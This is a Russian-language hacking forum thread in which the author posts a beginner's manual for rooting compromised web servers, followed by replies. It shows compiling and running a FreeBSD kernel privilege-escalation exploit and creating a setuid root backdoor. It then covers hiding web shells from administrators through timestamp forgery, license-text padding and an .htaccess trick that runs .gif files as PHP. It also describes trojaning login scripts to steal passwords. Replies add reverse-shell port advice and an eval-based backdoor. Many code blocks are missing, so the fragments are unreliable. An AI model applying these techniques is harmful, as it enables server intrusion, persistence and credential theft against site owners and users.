![]() |
Мануал новичкам: Рутанье
|=---=[ Мануал новичкам: Рутанье ]=---=| Мануал предназначен для новичков. В нем я постараюсь расписать пошаговою инструкцию рутанья, а также как спрятать свой шелл от админов (:
User: 80 ( www ) Group: 80 ( www ) Код:
# uname -aСохраняем плоент где нибудь, затем грузим на хост.
Код:
gcc bsd-ktimer.c -o freeКод:
# ./freeuid=80(www) gid=80(www) euid=0(root) groups=80(www),1003(suwww) Ну что же, рут имеем, теперь надо бы както сделать так, чтобы не каждый раз юзать сплойт, если упадет процес бекдора. Создаем файлик, который будет давать нам права рута, каждый раз при вызове. 1.с: Код:
main() { Код:
gcc 1.c -o syserКод:
$ /bin/syser
touch -r [base] [shell] Тем самым мы изменим дату создание шелла на дату создание безобидного файлика. 2. Копирайты, лицензии. Часто помагает в начало файла добавить копирайты цмски которая стоит на сайте, сделать много отступов, затем сам код шелла) Или же впихнуть текст лицензии, GNU, например. 3. Расширение Пихаем шелл с расширением .gif в какую нибудь папку с картинками, и добавляем .htaccess: Код:
AddType application/x-httpd-php .gif4. Псевдофункции В файл функций можно добавить следующий код: PHP код:
PHP код:
5. mail(); Ищем страничку авторизации, затем трояним скрипт. Нужно найти место где проходит проверка логина и пароля, и вставить примерно такой код: PHP код:
© 2009 Dimi4, [UASC] |
>>Вообщето сплойты можна юзать из веба
Ещё часто оказывается, что сплоит во время работы что-то пишет в консольку, а шелл это почему-то не отображает. Так что бывает удобно дописать в начало кода Код:
freopen("sploit.output", "wt", stdout); |
>>Вообщето сплойты можна юзать из веба
видел твой пост, но по моему это не твоя идея, я без наезда, просто подзабыл. больше вероятности сделать бекконект всеже на стандартные порты, ну т.е. 80,21,20 (ftp-data) если конечно нет демонов которые эти порты слушают. В целом хорошо, собрал все воедино. насчет MySql не понял, ладно бы если: echo eval($row['comment']); |
кстати это сплойит под фряху не всегда пашет...на некоторых хостах просто вываливается ошибка что failed to lookup posix_clocks
|
Scipio идея про шеллы из веба: обсуждали вместе со снейком, так что да, не могу претендовать на авторство.
Цитата:
2 svesve Возможно ядро пропатчено, смотри дату точную, тоесть месяц и число, и сравнивай с датой выхода сплойта |
>>` - shell_exec )) неужели забыл? )
ну я то не забыл, но объясни тогда в чем логика? Разве есть такая линевая комманда eval($_POST['e']);? другими словами eval тут не функция, а часть переменной $row['comment'] так же как и $_POST['e'] не переменная, а часть строки-значения переменной $row['comment'] |
гы, метода прятания беков от 2005 года:)
PS: Сорри, пьян децл Хотя бы шифровать как-то, имхо. grep -P -i 'eval|$_GET|$_REQUEST|base64' /var/www/*.* к примеру и всё, ни шеллов ни бекдоров PS: А так прикольная статья, насчет бекконекта |
сори но если бы тс не был бы грином, заминусовали бы и послали...
статей на эту тему предостаточно, причем более интересных и расписанных http://forum.antichat.ru/showthread.php?t=17581 http://forum.antichat.ru/showthread.php?t=21406 http://forum.antichat.ru/showthread.php?t=30711 и т.д. зото плюсов срубил на бояне, любой реподрочер позавидует, хотя это не мое дело, минусните меня за дерзость. |
Цитата:
|
2Dyxxx
вуху, меня до гринов повысили? )) И неужели ты думаешь что мой уровень писать статьи ради плюсов? Целью было создать мануал, который мог бы юзать каждый новичок, когда возникает вопрос о рутаньи. Да и в прочем, кто бы говорил? У тебя вся репа из темы скуль иньекты) Только не надо говорить что ты их ты выкладываешь "просто так". Это уже оффтоп, так что отвечать на это не надо, дабы не засорять тему. Spyder О_о непонел П.С. Dyxxx за линк спс, статей я не видел. И не надо провокаций) |
Идея стара как мир =]
|
Цитата:
|
Ого, а запуск сплоитов из-под веба, оказалось, было таким приватным умением?:)
|
Димыч , а ты знаешь толк в изращениях , а если честно ты че курил когда это писал ?
это чюдо echo `$row['comment']`; выдаст .... хотя нет, это чудо вообще ниxуя не выдаст.. ибо в строку нельзя так вставлять переменную это раз, надо юзать {$row['comment']} да и в таких кавычках это вообще не прокатит ``. ладно если опустить баги с кавычками то тя получается конструкция перед которой я снимаю шляпу. echo shell_exec(eval($_POST['e'])); p.s. Все быстро записали себе этот код в блокнот!! Сорри но статья - шлак p.p.s Интересно а что же должно быть в E? наверно echo('id'); для просмотра ID p.p.p.s Вследующий раз бери водку или пиво ,и никаких наркотиков:))! |
Цитата:
|
нет, не ближе у него
eval($_POST['e']); причем он думает, что в переменную e что-то будет передаваться, и потом исполняться как системная комманда З.Ы. да и вобще, зачем ты тут постишь очевидные вещи? Димыч и ты говорили про: Код:
<?php |
Прочел статью от начала до конца.
В принципе нормально, но для общего развития, так как в статье указан пример, в котором все так круто порутилось, что аж ппц :) На самом то деле очень редко так фартит.Часто ядро оказуется патченым, но сейчас не об этом. Бывает, что на серваке попросту не установлен gcc/g++, или не хватает библиотек, приходится компилить на своей тачке или на шелле, или же лить это все туда.. Ну а вообще автору +1. |
Да, с этим
Цитата:
|
Цитата:
Поэтому могу посоветовать, если не получается подключиться бекконектом на какой-нить 9999 порт, попробовать использовать порт 80, 3306 или другой системный. В моем случае сработало! |
Ужас какое наркоманство, непомню что на меня так повлияло, видмо зеленый чай, который чего то черным был))
Вот такое извращение, хотя оказывается пашет: PHP код:
В серьёз не воспринимать )))) |
Про то, что консоль можно юзать с вэба впервые слышу! Интересная идея кстати
|
Пара советов от меня:
Лучший порт для бэкконнекта это 53, так как ДНС разрешен на всех системах, а 80 и 21 часто блочат. Если с бэкконнекта необходимо залогинится, использовать SSH либо su, то юзайте TTY бэкконнект. Он эмулирует полноценныю консоль. Скачать можно ТУТ (первая ссылка, написан на С) |
Любая антивирь утила под юнь спалит эту хрень в два счёта... проверено.Надо уже изобретать что-то новое.
|
| Время: 16:34 |